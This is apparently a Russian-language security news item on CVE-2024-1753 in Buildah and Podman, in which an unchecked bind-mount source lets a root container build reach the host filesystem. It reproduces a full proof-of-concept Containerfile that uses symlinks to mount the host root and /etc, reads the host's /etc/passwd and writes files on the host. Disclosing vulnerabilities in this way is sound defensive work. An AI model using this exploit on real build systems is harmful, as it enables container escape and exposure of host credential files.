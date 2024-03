В пакетах Buildah и Podman выявлена уязвимость (CVE-2024-1753), позволяющая получить полный доступ к файловой системе хост-окружения на стадии сборки контейнера, запускаемого с правами root. На системах с включённым SELinux доступ к хостовой ФС ограничивается режимом только чтения. Исправление пока доступно в виде патча, который несколько минут назад принят в кодовую базу Buildah. Уязвимость вызвана тем, что при выполнении монтирования частей ФС через команду "mount --bind" во время сборки на стадии RUN, аргумент с исходным каталогом (параметр "source=") не проверяется на предмет существования в корневой ФС. Оформленный злоумышленником файл конфигурации Containerfile может использовать образ контейнера, в котором исходный каталог для монтирования оформлен в виде символической ссылки на корневую ФС. В этом случае операция монтирование приведёт к монтированию внутрь контейнера корневой ФС хост-окружения, что позволит на стадии RUN получить полный доступ к файловой системе хост-окружния и организовать выход из контейнера во время сборки командами "buildah build" или "podman build". Пример вредоносного файла Containerfile, сборка которого командой "podman build -f ~/Containerfile ." приведёт к показу содержимого /etc/passwd и созданию файлов /BIND_BREAKEOUT и /etc/BIND_BREAKOUT2 в хост-окружении: FROM alpine as base RUN ln -s / /rootdir RUN ln -s /etc /etc2 FROM alpine RUN echo "ls container root" RUN ls -l / RUN echo "With exploit show host root, not the container's root, and create /BIND_BREAKOUT in / on the host" RUN --mount=type=bind,from=base,source=/rootdir,destination=/exploit,rw ls -l /exploit; touch /exploit/BIND_BREAKOUT; ls -l /exploit RUN echo "With exploit show host /etc/passwd, not the container's, and create /BIND_BREAKOUT2 in /etc on the host" RUN --mount=type=bind,rw,source=/etc2,destination=/etc2,from=base ls -l /; ls -l /etc2/passwd; cat /etc2/passwd; touch /etc2/BIND_BREAKOUT2; ls -l /etc2